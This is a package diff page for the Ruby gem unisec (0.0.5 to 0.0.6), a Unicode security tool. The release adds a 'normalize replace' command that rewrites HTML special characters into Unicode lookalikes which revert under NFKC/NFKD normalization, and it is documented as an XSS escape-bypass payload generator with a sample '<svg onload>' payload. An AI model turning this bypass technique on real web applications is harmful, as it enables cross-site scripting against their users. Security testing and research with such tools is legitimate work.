RubyGems - unisec - Versions diffs - 0.0.5 → 0.0.6 - Mend

unisec 0.0.5 → 0.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (6) hide show

checksums.yaml +4 -4
data/lib/unisec/cli/cli.rb +2 -1
data/lib/unisec/cli/normalization.rb +71 -39
data/lib/unisec/normalization.rb +43 -0
data/lib/unisec/version.rb +1 -1
metadata +2 -2

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 0b6f74de3dc3d0f9aebac59ff68bc5731b7185e9e73e86e87477c23408900452
-  data.tar.gz: 910be7b95b71022f352cc6d612c7752fe2ea13a0e6e3dc89aca4566cb1879569
+  metadata.gz: 60d2859aca7324908f4894b8ca2cc99b145657e7ea68fbc51e11a1e787886a57
+  data.tar.gz: 4c426795faa520f02daec94f1cf14379a4a994a0902cc52640e2a358b210c28b
 SHA512:
-  metadata.gz: 47b730a884a30979be5968d90a30bc214ec93725383f20c48a02ec1090ce64e6043f95427c7ed79ebc31b3b4e1d3b66e01c7b0d63f936793f6c8eb008ce5f9fe
-  data.tar.gz: be9ca5cc40baaf9cd56141a3a8e41f5709c6071d5e7797ebd64a1daf231671e6835c168bce53f540e72ead4f68fc93bfd2d211764ba474e1cd8a4ca1bf5e7a65
+  metadata.gz: 8d5c67bf6bc1e76253971cc4b3bdccc513fb13fd3d3fa2dcdffa97329e09b45654b2f2f0a2c734e54c87bcffdb71adfa392a352ec757b6de0f761feaa8b73d28
+  data.tar.gz: 7be763bb5b2adb2139771c3e3f789c101f884209c7ca7e5488df18e97c6cac25578b11c34b451efaddeb11a9926fefeb935857da32a33e3de192b0e39cb46532

data/lib/unisec/cli/cli.rb CHANGED Viewed

@@ -24,7 +24,8 @@ module Unisec
       register 'confusables randomize', Confusables::Randomize
       register 'grep', Grep
       register 'hexdump', Hexdump
-      register 'normalize', Normalize
+      register 'normalize all', Normalize::All
+      register 'normalize replace', Normalize::Replace
       register 'properties char', Properties::Char
       register 'properties codepoints', Properties::Codepoints
       register 'properties list', Properties::List

data/lib/unisec/cli/normalization.rb CHANGED Viewed

@@ -8,45 +8,77 @@ module Unisec
   module CLI
     module Commands
       # CLI sub-commands `unisec normalize xxx` for the class {Unisec::Normalization} from the lib.
-      #
-      # Command `unisec normalize "example"`
-      #
-      # Example:
-      #
-      # ```plaintext
-      # ➜ unisec normalize ẛ̣
-      # Original: ẛ̣
-      #   U+1E9B U+0323
-      # NFC: ẛ̣
-      #   U+1E9B U+0323
-      # NFKC: ṩ
-      #   U+1E69
-      # NFD: ẛ̣
-      #   U+017F U+0323 U+0307
-      # NFKD: ṩ
-      #   U+0073 U+0323 U+0307
-      #
-      # ➜ unisec normalize ẛ̣  --form nfkd
-      # ṩ
-      # ```
-      class Normalize < Dry::CLI::Command
-        desc 'Normalize in all forms'
-        argument :input, required: true,
-                         desc: 'String input. Read from STDIN if equal to -.'
-        option :form, default: nil, values: %w[nfc nfkc nfd nfkd],
-                      desc: 'Output only in the specified normalization form.'
-        # Normalize in all forms
-        # @param input [String] Input string to normalize
-        def call(input: nil, **options)
-          input = $stdin.read.chomp if input == '-'
-          if options[:form].nil?
-            puts Unisec::Normalization.new(input).display
-          else
-            # using send() is safe here thanks to the value whitelist
-            puts Unisec::Normalization.send(options[:form], input)
+      module Normalize
+        # Command `unisec normalize all "example"`
+        #
+        # Example:
+        #
+        # ```plaintext
+        # ➜ unisec normalize all ẛ̣
+        # Original: ẛ̣
+        #   U+1E9B U+0323
+        # NFC: ẛ̣
+        #   U+1E9B U+0323
+        # NFKC: ṩ
+        #   U+1E69
+        # NFD: ẛ̣
+        #   U+017F U+0323 U+0307
+        # NFKD: ṩ
+        #   U+0073 U+0323 U+0307
+        #
+        # ➜ unisec normalize all ẛ̣  --form nfkd
+        # ṩ
+        # ```
+        class All < Dry::CLI::Command
+          desc 'Normalize in all forms'
+          argument :input, required: true,
+                           desc: 'String input. Read from STDIN if equal to -.'
+          option :form, default: nil, values: %w[nfc nfkc nfd nfkd],
+                        desc: 'Output only in the specified normalization form.'
+          # Normalize in all forms
+          # @param input [String] Input string to normalize
+          def call(input: nil, **options)
+            input = $stdin.read.chomp if input == '-'
+            if options[:form].nil?
+              puts Unisec::Normalization.new(input).display
+            else
+              # using send() is safe here thanks to the value whitelist
+              puts Unisec::Normalization.send(options[:form], input)
+            end
+          end
+        end
+        # Command `unisec normalize replace "example"`
+        #
+        # Example:
+        #
+        # ```plaintext
+        # ➜ unisec normalize replace "<svg onload=\"alert('XSS')\">"
+        # Original: <svg onload="alert('XSS')">
+        #   U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
+        # Bypass payload: ﹤svg onload=＂alert(＇XSS＇)＂﹥
+        #   U+FE64 U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+FF02 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+FF07 U+0058 U+0053 U+0053 U+FF07 U+0029 U+FF02 U+FE65
+        # NFKC: <svg onload="alert('XSS')">
+        #   U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
+        # NFKD: <svg onload="alert('XSS')">
+        #   U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
+        #
+        # ➜ echo -n "<svg onload=\"alert('XSS')\">" | unisec normalize replace -
+        # ```
+        class Replace < Dry::CLI::Command
+          desc 'Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)'
+          argument :input, required: true,
+                           desc: 'String input. Read from STDIN if equal to -.'
+          # Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)
+          # @param input [String] Input string to normalize
+          def call(input: nil, **_options)
+            input = $stdin.read.chomp if input == '-'
+            puts Unisec::Normalization.new(input).display_replace
           end
         end
       end

data/lib/unisec/normalization.rb CHANGED Viewed

@@ -5,6 +5,16 @@ require 'ctf_party'
 module Unisec
   # Normalization Forms
   class Normalization
+    # HTML escapable characters mapped with their Unicode counterparts that will
+    # cast to themself after applying normalization forms using compatibility mode.
+    HTML_ESCAPE_BYPASS = {
+      '<' => ['﹤', '＜'],
+      '>' => ['﹥', '＞'],
+      '"' => ['＂'],
+      "'" => ['＇'],
+      '&' => ['﹠', '＆']
+    }.freeze
     # Original input
     # @return [String] untouched input
     attr_reader :original
@@ -64,6 +74,25 @@ module Unisec
       str.unicode_normalize(:nfkd)
     end
+    # Replace HTML escapable characters with their Unicode counterparts that will
+    # cast to themself after applying normalization forms using compatibility mode.
+    # Usefull for XSS, to bypass HTML escape.
+    # If several values are possible, one is picked randomly.
+    # @param str [String] the target string
+    # @return [String] escaped input
+    def self.replace_bypass(str)
+      str = str.dup
+      HTML_ESCAPE_BYPASS.each do |k, v|
+        str.gsub!(k, v.sample)
+      end
+      str
+    end
+    # Instance version of {Normalization.replace_bypass}.
+    def replace_bypass
+      Normalization.replace_bypass(@original)
+    end
     # Display a CLI-friendly output summurizing all normalization forms
     # @return [String] CLI-ready output
     # @example
@@ -90,5 +119,19 @@ module Unisec
         colorize.call('NFD', @nfd) +
         colorize.call('NFKD', @nfkd)
     end
+    # Display a CLI-friendly output of the XSS payload to bypass HTML escape and
+    # what it does once normalized in NFKC & NFKD.
+    def display_replace
+      colorize = lambda { |form_title, form_attr|
+        "#{Paint[form_title.to_s, :underline,
+                 :bold]}: #{form_attr}\n  #{Paint[Unisec::Properties.chars2codepoints(form_attr), :red]}\n"
+      }
+      payload = replace_bypass
+      colorize.call('Original', @original) +
+        colorize.call('Bypass payload', payload) +
+        colorize.call('NFKC', Normalization.nfkc(payload)) +
+        colorize.call('NFKD', Normalization.nfkd(payload))
+    end
   end
 end

data/lib/unisec/version.rb CHANGED Viewed

@@ -2,5 +2,5 @@
 module Unisec
   # Version of unisec library and app
-  VERSION = '0.0.5'
+  VERSION = '0.0.6'
 end

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: unisec
 version: !ruby/object:Gem::Version
-  version: 0.0.5
+  version: 0.0.6
 platform: ruby
 authors:
 - Alexandre ZANNI
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2024-02-16 00:00:00.000000000 Z
+date: 2024-05-17 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: ctf-party